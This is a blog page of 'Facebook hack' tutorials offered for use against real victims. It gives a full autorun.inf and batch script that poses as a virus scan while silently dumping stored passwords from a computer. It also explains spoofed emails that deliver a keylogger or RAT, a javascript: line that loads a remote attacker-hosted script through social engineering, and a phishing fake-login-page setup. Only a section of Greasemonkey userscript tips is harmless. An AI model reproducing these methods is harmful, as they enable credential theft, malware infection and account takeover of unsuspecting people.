sdr

Click TO See Android Tricks Click To See Facebook Tricks Windows 8 Launchs

ads

Showing posts with label FAcebook Hack. Show all posts
Showing posts with label FAcebook Hack. Show all posts

Hack facebook twitter account using pen drive



Hello frnds i am with a new and intersting topic. Today i am gona show how to hack facebook , twitter or we can say all password save in a computer using a usb(pen drive).So lets get on the topic

1. U have to download this rar archive from here.

2.After downloading ,extract and copy all the executable(.exe files) into your USB- Pendrive.
3.Now open a Notepad and write the following text into it


[autorun]
open=launch.bat
ACTION= Perform a Virus Scan



save the Notepad and rename it from New Text Document.txt to autorun.inf ,Now copy the autorun.inf file onto your USB pen drive.
4.Now open an another Notepad and copy the following text onto it.


start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

start ChromePass.exe /stext chrome.txt


Now save the file as launch.bat ,Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff /hack the passwords. You can use this pen-drive on any computer to sniff the stored passwords. Just follow the steps given below


1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files ,open the files to view the stored passwords
This hack works on Windows 2000, XP, Vista and Windows 7

Password of file is Matrixa


I am not responsible for any type of harm 
READ MORE - Hack facebook twitter account using pen drive

guaranteed facebook hack

This tutorial is like a spreading tutorial way basically. But more precise and powerful.

REQUIREMENTS:-

1) A fully FUD server(SERVER BEING FUD is the most important part of the hack)
2) Patience

That's all...

Now coming to the hack...

there are basically thousands of tutorials in HF about keylogger,RAT,stealer and crypting... so read one and make your server fully fud...

Now do just as what i say:-

1) go to "http://emailattack.host22.com/emailspoof.php" and leave that tab open

2) now login to your facebook and copy the username of the person(FB username) you want to hack

like this....

http://imageshack.us/photo/my-images/543/username.png

so basically the name after the http://www.facebook.com/ is the username... 

in my example "RANDOM" is the username....

if the link shows url like "https://www.facebook.com/profile.php?id=100003721756694" then you cannot use this method on them....

3) as you are the friend of the person you must know who he his/her best friend or just close friend....

so basically get his email id attached to his Facebook like

http://imageshack.us/photo/my-images/152/contactw.png

[this can be hard if you don't have this person as your friend]

anyways you can ask his/her email id if you know him....

4)Now just open that spoofer tab and paste the info as follows:-

in Spoofed Email: the id you stolen from the contact info: ex: something@anymail.com

in Targets Email: username@facebook.com, ex: random@facebook.com

in Reply Email: same as spoofed email

in message title: hi or whatever

in message body : Hi check out my new pics uploaded here: "link of your key-logger,rat or whatever"

HE/SHE WILL RECEIVE THAT MESSAGE FROM THE SPOOFED PERSON AND AS HE/SHE IS HER CLOSE FRIEND SHE WILL DEFINITELY DOWNLOAD AND RUN ITYeye

slave WILL TAKE SOME TIME TO READ THE MESSAGE>DOWNLOAD THE FILE>RUN IT. THAT'S WHY I SAID PATIENCE IS A REQUIREMENT Ninja....

PRO-TIP: 

1) If you are using the message from the example then i suggest you to download some of the spoofed person(slave friend) 

pictures and use icon-changer to change your server icon to JPEG icon and put all that pics and your server to an .rar file and 

upload it to the hosting site....

Lol,,,, no one sees the extension if you do this thing.. 

2) use rat's crew extension spoofer to change the extension to JPEG and change server icon to JPEG too....
READ MORE - guaranteed facebook hack

How To Hack Your Facebook Account with Greasemonkey & Javascript

Facebook is pretty awesome, but it is far from perfect. More than once, I’ve heard complaints about some of Facebook’s technical aspects. Sadly, Facebook isn’t open-sourced, so users can’t change anything themselves – or can they?

By using simple pieces of Javascript code, or by applying Firefox Greasemonkey userscripts, users can change the appearance and workings of Facebook themselves.

Learn how to hack Facebook accounts for fun, or tweak something useful. Believe me, it really is all in your hands.

Facebook Account Javascript Hacks

In these following hacks we’ll be using basic Javascript to toy around with Facebook. Note that we’re not going to hack into Facebook accounts, or anything of the like. Most of these ‘hacks’ are temporary and will disappear once you refresh the page. They also won’t be visible to users on other computers. So why are we doing it? – Because it’s fun!


These Javascript snippets, which we’ll supply below, simply need to be pasted into the address bar. Hit enter, et voila!

Changing Profile Colour

This will change the colour of your Facebook bar to a color of choice.


Just paste the following code in your address bar and hit enter. You can replace ‘red’ with any color you want – black, white, green or even orrange. If you want to reverse the effect, press Ctrl+F5 for a hard reload of the page.

javascript:void(document.getElementById('fb_menubar').style.background='red');

View Chat History with Offline Friends

Unfortunately, you can’t normally view the chat history of online friends. If you’re trying to remember something that was said, waiting for them to come back online is one hell of a bother. Instead, you can just use this – pretty useful – Javascript hack.

First of all, we need to get your friend’s Facebook ID. When you visit his page indirectly (through your friends list or by using the search engine), you’ll be able to see it as a number in the address bar.


Another way to retrieve someone’s ID is by going to the Friends widget on their page, and right-clicking See All. Then you’ll have to copy the link location and paste it in your address bar.


Once you’ve got someone’s ID, simply paste the following code in your address bar, replacing 1122334455 with the relevant number.

javascript:buddyList.itemOnClick(1122334455);


Other Javascript hacks

The preceding two hacks are without doubt the most impressive or useful ones. Below are some of the other tricks you can pull off by using Javascript. We’re not going to deep on this because they’re all things you can do manually as well.

Change chat status to invisible:

javascript:statusControl.sendVisibility(false);

Change chat status to visible:

javascript:statusControl.sendVisibility(true);

Close all chat windows with person 1122334455:

javascript:chatDisplay.tabs[1122334455].tabXOnClick();

Open application tab:

javascript:applicationDock.toggleTab();

Bring up notifications:

javascript:presence.toggleTab('chat_status_control','chat_status_control_tab');

Bring up friends list:

javascript:buddyList.toggleTab();

Facebook Greasemonkey Hacks


Greasemonkey is one of the best firefox add-ons in existence. By using ‘userscripts’, you can customize nearly every website. Read more about Greasemonkey in .

Today we won’t be focusing too hard on Greasemonkey itself, but on some of the great Facebook-specific userscripts.

Facebook Auto-login – One of the simplest, but perhaps also one of the most useful userscripts you’ll find. This one will automatically log into Facebook, as long as Firefox remembers your password, saving you a lot of hassle.

Auto-Colorizer for Facebook – This script will recolor your Facebook page by applying the color scheme of the most dominant picture currently showing on the page. As you can imagine, this can create some exciting, and also ambient effects.

FacebookDeletes – If you want to get rid of a lot of people at once, this is your man. This script can bulk delete friends, making the masacre all the easier.

Remove All Facebook Ads – Adblock still tends to miss a lot of Facebook ads. This script, frequently updated, will remove all thinkable Facebook ads, creating a completely click-safe Facebook environment.

External Apps Blocker – One of the most irritating things on Facebook are the abundance of quizzes, quote generators, and the like. Filtering all external app ‘stories’ from your homepage will be a lot easier if you use this script.
READ MORE - How To Hack Your Facebook Account with Greasemonkey & Javascript

How to Hack Facebook Fan Page

Today I will show you how to hack a Facebook fan page.  I hope you like this tutorial and give your feed back in the comments.
Now lets start the tutorial. First of all we will need to setup an exploit  and a website to host the exploit. If you already have a hosting then its great otherwise there are couple of free hosting websites that can be used for such purposes. I will tell you about it along with the tutorial
.
Disclaimer: Coder and related sites are not responsible for any abuse done using this trick.
 
1. Download the exploit from this Link.
 
2. After downloading it, you need to edit the it. Get notepad++, one of my hot favorite editor. You can download it from here.
 
3. Open the file named pagehack.js with notepad++. Now find the text admin@dailyhackingtips.com by pressing ctrl+f and replace it with your own email id which you have used while signing up for facebook.
 
4. Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the text Hey See what i got! and replace it with your own text. This text will be sent to the facebook wall of 15 friends of the victim. Since it is an autoposting bot, to prevent facebook from blocking it, I reduced its capacity to 15. Now just save it as anything.js (Tip: Be social engineer and rename it to something more attractive like getprizes.js or booster.js)
 
5. Now you have to upload this script to your server. For this make an account at 0fess.net or 000webhost.com (t35 or 110mb won’t help this time) and use filezilla and upload this to your root. So the address where your script is uploaded will be as follows:
www.yoursite.0fess.net/booster.js
6. Now comes the most important part of this Hack. You need to convince the admin of that Fan page to put the following code (Note: Don’t forget to replace the text in bold with the address of your script) in his browser’s address bar and hit enter while he is on Facebook.
javascript:(a = (b = document).createElement(“script”)).src = “//www.yoursite.0fess.net/booster.js“, b.body.appendChild(a); void(0)
Tip: You can fool him by making him greedy to grab something. You can also encode this in ASCII format for more better results.
READ MORE - How to Hack Facebook Fan Page

How To Hack a Facebook Account Using a Fake login Page | Hack any Facebook ID easily using a Phishing page / Fake Login page

Hello to all my friendz does anyone know how to hack any facebook account easily using a phishing page ? if you don't know about it then don't worry bcz today i am learning you . how can you hack any facebook account using a fake login page  .this tips is so easy but little confusing . i try my best to simplify it . so read this post carefully.. i hope you really enjoy it .
Phishing is one of the easiest methods that you can use to hack Facebook accounts or any other email accounts ,In this article i will explain how you can Hack Facebook accounts by using a Phisher (fake login page ) .



If your new to Phishing or you don't know what exactly Phishing is, then kindly read my previous article What is Phishing  Follow The Steps For Do this.




Hack a Facebook Account Using a Fake login Page :

 
1. First a fall you need a fake login page for facebook (fake.html),and a Php script to redirect and capture the victims passwords  (login.php), You can download both the files from Here



2. To get the password click Here



3. After you download the files, Open login.php,with a note pad and search for the term www.enteryoursite.com and replace it with the site address where you want the victim  to be redirected ,finally save it





Note : This a very important step redirect the victim to a proper site other wise the  victim will get suspicious .In our case we are making fake face book login page so its  better to redirect the victim to www.facebook.com/careers


4. Now create an account at Free web hosting site like 110mb.com , T35.com or ripway.com


5. Now upload both the files (fake.html , login.php ) to your hosting account and send the fake.html(fake facbook login page) link to your victim


   Example :-                           Click here




6. Now when the victim enters all his credentials, like login name and password in our fake login page and  when he clicks login He will be redirected to site which we did in step 3 



7. Now to see the victims id ,password, login to your hosting account "110mb.com " where you will see a new file "log.txt" .Open it to see the victims user id and the password




This is a simple but a very effective method to Hack face book accounts .If you have any doubts please feel free to comment
READ MORE - How To Hack a Facebook Account Using a Fake login Page | Hack any Facebook ID easily using a Phishing page / Fake Login page

FAcebook Blaster PRO

This tool allow you to post your message to multiple Facebook IDs with a sigle click and allow to send automated friend request.

download it from here:www.facebookblaster.com

READ MORE - FAcebook Blaster PRO